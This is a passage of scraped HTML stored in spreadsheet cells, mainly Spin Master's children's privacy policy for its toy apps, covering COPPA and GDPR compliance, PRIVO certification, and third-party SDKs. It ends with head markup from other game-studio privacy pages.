Colleggtibles™","slug":"hatchimals-colleggtibles","selected":false,"url":"/hc/en/14-hatchimals-colleggtibles/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2FqDPjZfjSknIia0cS9Dt-2sWpFmnR4FMaXulCkIdYhVkeiquD_VbJbQSZEUsgbTj1IW0%3Ds180-rw&amp;size=68x68&amp;kot=82fU%2FuhZ7EiiRWou0kZdO1yE42%2Fn0ffmlEMEbPxyLOA%3D","id":"spinmaster_app_20190116202521417-ae3e99e7ac6ecc4","title":" Hatchtopia Life","slug":"hatchtopia-life","selected":false,"url":"/hc/en/30-hatchtopia-life/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis3-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple113%2Fv4%2Fd1%2F72%2F0d%2Fd1720d9c-1847-0f23-62e5-1a9c04ce7049%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=b0SaGMEJVFD67uEldOO9HGksIQo3gMx2zxTj93%2B%2B%2Fzs%3D","id":"spinmaster_app_20190517205857727-d74d4c45e92c17b","title":"HedBanz","slug":"hedbanz","selected":false,"url":"/hc/en/36-hedbanz/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2FTuVmrA-Mr5oUVXx9JTmCLN3OGt-mxFdnAdtF-kEe4oNLqrPEE0QnZ2gwE1CveFUo5Zg%3Dw300&amp;size=68x68&amp;kot=HXvyADym%2Fx8kuZcvRhL8kzFZYGFJIHhPV%2BSV%2FhTZml8%3D","id":"spinmaster_app_20170209203235260-03791f3de33c2a9","title":"Meccano™","slug":"meccano","selected":false,"url":"/hc/en/13-meccano/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=http%3A%2F%2Fis1.mzstatic.com%2Fimage%2Fthumb%2FPurple71%2Fv4%2F49%2Fc9%2F82%2F49c9828c-5edd-6d16-8843-a8de2e1424f2%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=bL3qBYxChd11z91SCbmvAm1K91lci6w9WBrMdGmSI04%3D","id":"spinmaster_app_20160427213841958-2b2aff883d05292","title":"Meccanoid™","slug":"meccanoid","selected":false,"url":"/hc/en/6-meccanoid/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Fis3-ssl.mzstatic.com%2Fimage%2Fthumb%2FPurple124%2Fv4%2Fea%2F1e%2F9f%2Fea1e9f21-3610-e921-5339-5269594b728e%2Fsource%2F512x512bb.jpg&amp;size=68x68&amp;kot=tU3Gk9Z34pcRkQDCa2TyqlK0O2vjcmabqcZJupjLl44%3D","id":"spinmaster_app_20200810205821159-c45bdcda65a4188","title":"Mighty Express","slug":"mighty-express","selected":false,"url":"/hc/en/40-mighty-express/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"logo":"/improxy?url=https%3A%2F%2Flh3.googleusercontent.com%2F8dkoPtE0A9ZPOS-Zta-cd_HqzAAOfFkAbcbsrv1SDHrCrGJXMD2ZAqdc_SN0UvtQEw%3Ds180-rw&amp;size=68x68&amp;kot=pRdbE4RhD4APVZJVo3L0NkjPh9DjvLophyfRfn%2BBcRY%3D","id":"spinmaster_app_20191127004536664-e7b10e234ad9ebc","title":"Scritterz","slug":"scritterz","selected":false,"url":"/hc/en/38-scritterz/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"}]
     &lt;/script&gt;
   &lt;/static-dropdown&gt;
          &lt;div class="dropdown-header-left-container"&gt;
                &lt;static-dropdown class="hc-static-dropdown--platform-dropdown" type="widget" is-rtl="false"
                    modal-title="Choose a platform" placeholder="Search" direction="left" width="240px"&gt;
     &lt;script type="application/json"&gt;
           [{"title":"Web","type":"web","selected":true,"url":"/hc/en/37-gabby-s-dollhouse/faq/1168-privacy-policy/?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"title":"iOS","type":"ios","selected":false,"url":"/hc/en/37-gabby-s-dollhouse/faq/1168-privacy-policy/?p=ios&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"title":"Android","type":"android","selected":false,"url":"/hc/en/37-gabby-s-dollhouse/faq/1168-privacy-policy/?p=android&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"},{"title":"All platforms","type":"all","selected":false,"url":"/hc/en/37-gabby-s-dollhouse/faq/1168-privacy-policy/?p=all&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en"}]
     &lt;/script&gt;
   &lt;/static-dropdown&gt;
          &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;div class="content-wrapper faq-content-wrapper js-content-wrapper
    "&gt;
      &lt;div class="faq-page-cover "&gt;
        &lt;div class="faq-search js-faq-search"&gt;
          &lt;hc-search class="search-box js-hc-search js-hc-search-in-page-title"&gt;
     &lt;script type="application/json"&gt;
       {"platform_type":"web","show_search_icon":false,"show_contact_us_button":true,"is_preview":false,"hc_mode":"hc","app_id":"spinmaster_app_20191118215419960-f76b2f4f05484fa","app_slug":"gabby-s-dollhouse","search_url":"/hc/en/37-gabby-s-dollhouse/search/","lang":"en","is_sdkx":false,"is_rtl":false,"query_string":"?p=web&amp;s=privacy-policy&amp;f=privacy-policy&amp;l=en","contact_us_visibility_config":"always","translations":{"search_placeholder":"Search for articles","popular_articles_title":"Popular articles","search_results_text":"Search results for \"%1$s\"","no_results_text":"Sorry, but we couldn’t find anything.","all_results_text":"Show</t>
  </si>
  <si>
    <t>all results","more_help_text":"Need more help?","chat_with_us":"Chat with us","cancel_search_text":"Cancel"}}
     &lt;/script&gt;
   &lt;/hs-search&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;div class="faq-announcement-section"&gt;&lt;div class="js-announcement-section "&gt;
  &lt;hc-announcement class="hc-announcement-section" is-rtl="null"&gt;
      &lt;script type="application/json"&gt;
        null
      &lt;/script&gt;
    &lt;/hc-announcement&gt;
&lt;/div&gt;
&lt;/div&gt;
    &lt;main class="article-page " &gt;
      &lt;div class="faq-details js-faq-details"  data-faqid=spinmaster_faq_20200730190347721-073937ddfd0abc4 data-appid="spinmaster_app_20191118215419960-f76b2f4f05484fa"&gt;
        &lt;div class="faq-cover js-faq-load " data-faqid=spinmaster_faq_20200730190347721-073937ddfd0abc4&gt;
            &lt;div class="faq-breadcrumb"&gt;
                &lt;a class="link faq-breadcrumb-link" href=/hc/en/37-gabby-s-dollhouse/?p&amp;#x3D;web&amp;amp;s&amp;#x3D;privacy-policy&amp;amp;f&amp;#x3D;privacy-policy&amp;amp;l&amp;#x3D;en&gt;Home&lt;/a&gt; /
              &lt;a class="link faq-breadcrumb-link" href=/hc/en/37-gabby-s-dollhouse/section/310-privacy-policy/?p&amp;#x3D;web&amp;amp;s&amp;#x3D;privacy-policy&amp;amp;f&amp;#x3D;privacy-policy&amp;amp;l&amp;#x3D;en&gt;
                 Privacy Policy
              &lt;/a&gt;
             &lt;/div&gt;
          &lt;h2 class="faq-title"&gt;Privacy Policy&lt;/h2&gt;
        &lt;/div&gt;
        &lt;div class="faq-last-update js-faq-last-update"&gt;Last Updated: 70d&lt;/div&gt;
        &lt;div class="faq-article js-faq-article"&gt;
          &lt;div class="article-body js-faq-details-article-body"&gt;
            &lt;div class="faq-body js-faq-body"&gt;
              &lt;div&gt;Children’s Privacy Notice&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Spin Master Ltd hopes that you have as much fun playing our mobile games as we do creating them.</t>
  </si>
  <si>
    <t>Nothing is more important to us than your safety online and we do all we can to make sure that we protect your privacy.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Spin Master Ltd is a member of the PRIVO Kids Privacy Assured Program for COPPA Safe Harbor Certification and also a member of their &lt;strong&gt;GDPR&lt;/strong&gt;kids™ Privacy Assured Program. PRIVO is an independent, organization committed to safeguarding children's personal information collected online.</t>
  </si>
  <si>
    <t>Your parent can find more information on these programs and the mobile games in the Grown ups section below.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;When you play our mobile games, we do not collect any personal information from you. Personal information can include your full name, address, email or phone number.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We may collect general information, for example, the country you live in, how much time you spend in our game, mobile devices you use and similar. This information is not used to identify you and is only used to help us better understand our audience and improve our games for our users like you.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;The rest of this policy is for parents and grown-ups.</t>
  </si>
  <si>
    <t>If you have any questions about privacy, show this to your parents or legal guardians and they can contact us using the contact us details below&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;PRIVACY POLICY&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Effective Date November 2012 (last updated) Sept 2020&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;THIS PRIVACY POLICY APPLIES TO OUR APPS.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;This Policy describes how we Spin Master Ltd treat personal information in our mobile apps.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;OUR PRIVACY PRACTICES AND CHILDREN.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Under the Children’s Online Privacy Protection Act, you can review your child’s information by contacting us at&amp;nbsp;&lt;a href="mailto:customercare@spinmaster.com" target="_blank" rel="nofollow"&gt;customercare@spinmaster.com&lt;/a&gt;. You may also request that we no longer collect information from your child or have your child’s information deleted.</t>
  </si>
  <si>
    <t>To do so, contact us at the email address or phone number below.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;TABLE OF CONTENTS&lt;/div&gt;&lt;div&gt;1. We collect information from children&lt;/div&gt;&lt;div&gt;2. We collect information in different ways.&lt;/div&gt;&lt;div&gt;3.</t>
  </si>
  <si>
    <t>We use information as disclosed and described here.&lt;/div&gt;&lt;div&gt;4. We may share information with third parties.&lt;/div&gt;&lt;div&gt;5. We use standard security measures.&lt;/div&gt;&lt;div&gt;6.</t>
  </si>
  <si>
    <t>More on Children’s Information&lt;/div&gt;&lt;div&gt;7. We store information both in and outside of the united states.&lt;/div&gt;&lt;div&gt;8. Feel free to contact us if you have more questions.&lt;/div&gt;&lt;div&gt;9.</t>
  </si>
  <si>
    <t>A note to EU citizens&lt;/div&gt;&lt;div&gt;10. We may update this policy.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;1. WE COLLECT INFORMATION FROM CHILDREN&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We collect what is reasonably necessary for kids to participate in our Apps.</t>
  </si>
  <si>
    <t>This might include gender and age. We may also collect usernames and chat logs for customer service purposes. No personal information is stored from these help request.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We collect information if you or your child contacts us.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Other information.</t>
  </si>
  <si>
    <t>We may collect passive information about what activity you or the child did or how long the child played in an anonymous way.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;2. WE COLLECT INFORMATION IN DIFFERENT WAYS.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We collect information directly. For example, if you or your child create an account with us.</t>
  </si>
  <si>
    <t>We also collect information if you or your child contacts us.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We collect information passively.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;3. WE USE INFORMATION AS DISCLOSED AND DESCRIBED HERE.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;How we use children’s information. Unless permitted by law, we use children’s information after getting parental consent.</t>
  </si>
  <si>
    <t>In some circumstances we may not request parental consent. For example, if we are only going to use the information one time to respond to a direct request. Or if we are using information obtained from a child to get parental consent.</t>
  </si>
  <si>
    <t>We also use children’s information as described in any request for parental consent.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We may use information for security purposes. We may use information to protect our company, our customers, and Apps. We keep the data that we collect about you for as long as necessary for the purposes set out in this Privacy Policy.</t>
  </si>
  <si>
    <t>We use information as otherwise disclosed or permitted by law. For example, we will use information about children as we describe in parental consent requests.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;4. WE MAY SHARE INFORMATION WITH THIRD PARTIES.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We may share children’s information.</t>
  </si>
  <si>
    <t>We will share children’s information if we’re required to by law. We will share it if Spin Master transfers ownership. We will also share children’s information with vendors who help us run our Apps.</t>
  </si>
  <si>
    <t>We do not currently have any platforms that are designed to let children make their personal information publicly available.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We will share information with third parties who perform services on our behalf. For example, we share information with vendors who help us communicate with you and operate our services. For more information on the use of these third parties, see section 6 below.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We will share information if we think we have to in order to comply with the law or to protect ourselves.</t>
  </si>
  <si>
    <t>For example, we will share information to respond to a court order or subpoena. We may share it if a government agency or investigatory body requests. We might share information when we are investigating potential fraud.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We may share information with any successor to all or part of our business.</t>
  </si>
  <si>
    <t>For example, if part of our business was sold we may give our user information as part of that transaction.&lt;/div&gt;&lt;div&gt;We will share information with other Spin Master entities.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;5. WE USE STANDARD SECURITY MEASURES.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;The Internet is not 100% secure. We cannot promise that your use of our Apps will be completely safe.</t>
  </si>
  <si>
    <t>We encourage you to use caution when using the Internet. This includes not sharing your passwords. We keep personal information as long as it is necessary or relevant for the practices described in this Policy.</t>
  </si>
  <si>
    <t>We also keep information as otherwise required by law.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Parents, you can take steps to protect your kids too. To learn more about how to protect your child online, read the helpful&amp;nbsp;&lt;a href="http://www.onguardonline.gov/" target="_blank" rel="nofollow"&gt;information provided by the FTC&lt;/a&gt;. Please also read&amp;nbsp;&lt;a href="http://www.onguardonline.gov/articles/0031-protecting-your-childs-privacy-online" target="_blank" rel="nofollow"&gt;this bulletin&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;Some of our mobile applications are certified compliant by FTC approved COPPA safe harbor PRIVO.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Kids Privacy Assured by PRIVO: COPPA Safe Harbor Certification &amp;amp; GDPR&lt;/strong&gt;&lt;em&gt;kids™&lt;/em&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Spin Master Apps (owned and operated by Spin Master Ltd) is a member of the PRIVO Kids Privacy Assured Program&lt;em&gt; &lt;/em&gt;(“the Program”) for COPPA Safe Harbor Certification and &lt;strong&gt;</t>
  </si>
  <si>
    <t>GDPR&lt;/strong&gt;&lt;em&gt;kids™&lt;/em&gt;. PRIVO is an independent, third-party organization committed to safeguarding children's personal information collected online.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;COPPA Safe Harbor Certification &lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;a href="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/d7d9cd0f-0afa-4d45-9a02-d54a60a4ceea.png" target="_blank" data-lightbox="true" rel="nofollow"&gt;&lt;img src="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/d7d9cd0f-0afa-4d45-9a02-d54a60a4ceea-2t.png" srcset="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/d7d9cd0f-0afa-4d45-9a02-d54a60a4ceea-t.png 1x, https://d2duuy9yo5pldo.cloudfront.net/spinmaster/d7d9cd0f-0afa-4d45-9a02-d54a60a4ceea-2t.png 1.5x" data-orientation="landscape"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;To view the PRIVO verified page for the COPPA Safe Harbor program please visit this link: &lt;a href="https://cert.privo.com/#/companies/spnMster" target="_blank" rel="nofollow"&gt;https://cert.privo.com/#/companies/spnMster&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;The Program certification applies to the digital properties listed on the PRIVO verified page,&lt;/strong&gt;The certification Seal posted on this page indicates Spin Master Ltd has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process. If you have questions or concerns about our privacy practices, please contact us at 1-800-622-8339 or customercare@spinmaster.com.</t>
  </si>
  <si>
    <t>If you have further concerns after you have contacted us, you can contact PRIVO directly at &lt;a href="https://connect.emailsrvr.com/owa/redir.aspx?C=wkyuGTKjk4BL06fVgwOlAbUOTHdrV8it-WKjYwds-cbcRSOv043VCA..&amp;amp;URL=mailto%3aprivacy%40privo.com" target="_blank" rel="nofollow"&gt;privacy@privo.com&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;GDPR&lt;/strong&gt;&lt;em&gt;kids™ &lt;/em&gt;&lt;strong&gt;Privacy Assured&lt;/strong&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;a href="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/18260cd9-840b-415d-97ab-2982e2d64599.png" target="_blank" data-lightbox="true" rel="nofollow"&gt;&lt;img src="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/18260cd9-840b-415d-97ab-2982e2d64599-2t.png" srcset="https://d2duuy9yo5pldo.cloudfront.net/spinmaster/18260cd9-840b-415d-97ab-2982e2d64599-t.png 1x, https://d2duuy9yo5pldo.cloudfront.net/spinmaster/18260cd9-840b-415d-97ab-2982e2d64599-2t.png 1.5x" data-orientation="landscape"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;To view the PRIVO verified page for the GDPR&lt;em&gt;kids&lt;/em&gt;™ Privacy Assured Program please visit this link: &lt;a href="https://cert.privo.com/#/companies/spnMster" target="_blank" rel="nofollow"&gt;https://cert.privo.com/#/companies/spnMster&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;strong&gt;The Program applies to the digital properties listed on the PRIVO verified page. &lt;/strong&gt; The PRIVO &lt;strong&gt;</t>
  </si>
  <si>
    <t>GDPR&lt;/strong&gt;&lt;em&gt;kids™&lt;/em&gt;&amp;nbsp;Privacy Assured Program supports child directed services known as Information Society Services under the General Data Protection Regulation (GDPR), to comply with the requirements of this legislation. It impacts any child directed service in an EU Member State and any service globally that collects and or processes the personal data of children and minors.</t>
  </si>
  <si>
    <t>There is no safe harbor for the GDPR to date, but to ensure this company's services meet the program requirements, we conduct regular monitoring and consulting.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;6. MORE ON CHILDREN’S INFORMATION&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We do not actively collect any information from children in our apps. We do not show advertising.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;The following Spin Master apps use the device camera for various in-game functions.</t>
  </si>
  <si>
    <t>No images or videos are stored or shared by Spin Master and are only available on the user’s mobile device.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;The Meccano app is used alongside the MAX Robotic Interactive Toy and Meccano Spider Robotic Programmable Toy. The app allows children to create videos using pre-determined assets for each robot.&lt;/li&gt; &lt;/ul&gt;&lt;ul&gt;&lt;li&gt;FPV DR1 Drone allows users to film video with the camera on their Air Hogs drone.&lt;/li&gt; &lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Awesome Bloss’ems and Dragamonz use the device camera for the AR (augmented reality) experience.&lt;/li&gt; &lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Hedbanz uses the device camera to scan the game cards and add filters to the user’s face. Users can take photos with the filter set and save these to their device.&lt;/li&gt; &lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Hatchtopia Life uses the device camera to scan toy codes to unlock content in the game.&lt;/li&gt; &lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Gifeez uses the device camera to take photos that can be edited within the app.</t>
  </si>
  <si>
    <t>All edited photos are saved to the user’s device.&lt;/li&gt; &lt;/ul&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Our third party service providers passively collect information to help improve our services. For more information on these third party service providers please see below.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;We use the following third parties in our apps:&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Dragamonz and Awesome Bloss’ems use third party software to provide the Augmented Reality functionality. This software is provided by third party provider The8thWall.</t>
  </si>
  <si>
    <t>They do not collect or stores any personal information. For more information go to: &lt;a href="https://www.8thwall.com/terms.html" target="_blank" rel="nofollow"&gt;https://www.8thwall.com/terms.html&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Some Apps use Playfab to support internal operations. User information is collected only in anonymized form, find more information here &lt;a href="https://privacy.microsoft.com/en-us/privacystatement" target="_blank" rel="nofollow"&gt;https://privacy.microsoft.com/en-us/privacystatement&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;PlayFab collects a masked IP address to determine location information.</t>
  </si>
  <si>
    <t>The masked address allows PlayFab to collect latitude and longitude information sufficient enough to determine city, country and continent.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Hedbanz and Awesome Bloss’ems use third party WIkitude for augmented reality services. For more information, please see the Wikitude privacy policy here: &lt;a href="https://www.wikitude.com/legal/privacy-policy/" target="_blank" rel="nofollow"&gt;https://www.wikitude.com/legal/privacy-policy/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Hedbanz uses ULSee for Face Tracking Software. ULSee’s Single Face Tracker Unity Plugin provides facial feature tracking to augment the user’s face with game specific animations.</t>
  </si>
  <si>
    <t>Facial features are computed offline during a game session and are not persistent across game sessions. Facial features are not shared with any remote system and are used in the Hedbanz app only. For more information, please see the ULSee privacy policy: &lt;a href="https://sdk-key.ulsee.club/" target="_blank" rel="nofollow"&gt;https://sdk-key.ulsee.club/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Gabby’s Dollhouse uses Google’s Firebase for analytics purposes and to better understand your use of the app.</t>
  </si>
  <si>
    <t>Firebase does not share your data. For more information on the Firebase’s collection and use please review the privacy policy here: &lt;a href="https://firebase.google.com/support/privacy" target="_blank" rel="nofollow"&gt;https://firebase.google.com/support/privacy&lt;/a&gt; and here: &lt;a href="https://policies.google.com/privacy" target="_blank" rel="nofollow"&gt;https://policies.google.com/privacy?hl=en-US&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;By using Gabby's Dollhouse you agree to the YouTube's Terms of Service (&lt;a href="https://www.youtube.com/t/terms" target="_blank" rel="nofollow"&gt;https://www.youtube.com/t/terms&lt;/a&gt;) and YouTube's privacy policy (&lt;a href="http://www.youtube.com/t/privacy" target="_blank" rel="nofollow"&gt;http://www.youtube.com/t/privacy&lt;/a&gt;). YouTube may modify or revise these Terms of Service and policies at any time, and you agree to be bound by such modifications or revisions.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;7.</t>
  </si>
  <si>
    <t>WE STORE INFORMATION BOTH IN AND OUTSIDE OF THE UNITED STATES.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Information we maintain may be stored both within and outside of the United States. Where possible, we try to keep the information you supply to us locally. However, as part of the services offered through our Apps, the information you provide to us may be transferred to countries outside the European Economic Area (EEA).</t>
  </si>
  <si>
    <t>By way of example, this may happen where any of our servers are hosted by one of our Spin Master offices outside of the EEA, or one of our service providers is located in a country outside of the EEA. We may also share information between our group companies which are located in countries worldwide. If you require contact details of our other group companies, please contact us.</t>
  </si>
  <si>
    <t>Our Apps are subject to U.S. laws, which may not afford the same level of protection as those in your country. These countries may not have similar data protection laws to the EEA. If we transfer your information outside of the EEA in this way, we will take appropriate steps to ensure that any personal data relating to you will continue to be adequately protected.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;8.</t>
  </si>
  <si>
    <t>FEEL FREE TO CONTACT US IF YOU HAVE MORE QUESTIONS.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt; If you have any questions about this Policy or our processing of data about you, please contact us at&amp;nbsp;&lt;a href="mailto:dpo@spinmaster.com" target="_blank" rel="nofollow"&gt;dpo@spinmaster.com&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;Or via mail at:&lt;/div&gt;&lt;div&gt;Data Protection Officer&lt;/div&gt;&lt;div&gt;225</t>
  </si>
  <si>
    <t>King Street West&lt;/div&gt;&lt;div&gt;Toronto, ON M5V 3M2&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;1-800-622-8339&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;If you have a concern about our handling of your personal information, please get in contact with us first so we can try to resolve your query. If however you feel we have not dealt with your concern and that we are failing to meet our legal obligations, you can report this to your local data protection regulator.&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;9. A NOTE TO EU CITIZENS&lt;/div&gt;&lt;div&gt;&lt;br&gt;Spin Master complies with the rights given to EU Citizens under the General Data Protection Regulation (GDPR).</t>
  </si>
  <si>
    <t>These rights are as follows:&lt;/div&gt;&lt;div&gt;&amp;nbsp;&lt;/div&gt;&lt;div&gt;* Correcting your Information – the right to have your personal information updated to ensure it is up-to-date and accurate.&lt;/div&gt;&lt;div&gt;* Wit</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340143"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340143"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</si>
  <si>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
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;
&lt;link rel="pingback" href="https://baramgames.com/xmlrpc.php"&gt;
&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;!-- This site is optimized with the Yoast SEO plugin v20.5 - https://yoast.com/wordpress/plugins/seo/ --&gt;
&lt;title&gt;Privacy Policy - Baram Games&lt;/title&gt;
&lt;link rel="canonical" href="https://baramgames.com/privacy-policy/" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Privacy Policy - Baram Games" /&gt;
&lt;meta property="og:description" content="HomeAbout UsGamesContact Us HomeAbout UsGamesContact UsPrivacy PolicyYour privacy is important to us. I Baram Games’s policy (referred in this document as “We”, “Company”, and “Baram Games”), to respect your privacy and comply with any applicable law and regulation regarding any personal information we may collect about you, including across our applications users and visitors ofhttps://baramgames.com (the “website”).This Policy explains:what is personal data;what type of personal data We collect;means and reasons to collect it;subjects that we may share your personal data with;ways of contacting us in regards to your personal data.&amp;nbsp;Personal information is any information about you which can be used…" /&gt;
&lt;meta property="og:url" content="https://baramgames.com/privacy-policy/" /&gt;
&lt;meta property="og:site_name" content="Baram Games" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/BaramGames/" /&gt;
&lt;meta property="article:modified_time" content="2023-04-05T04:07:03+00:00" /&gt;
&lt;meta name="twitter:card" content="summary_large_image" /&gt;
&lt;meta name="twitter:site" content="@BaramGames" /&gt;
&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
&lt;meta name="twitter:data1" content="4 minutes" /&gt;
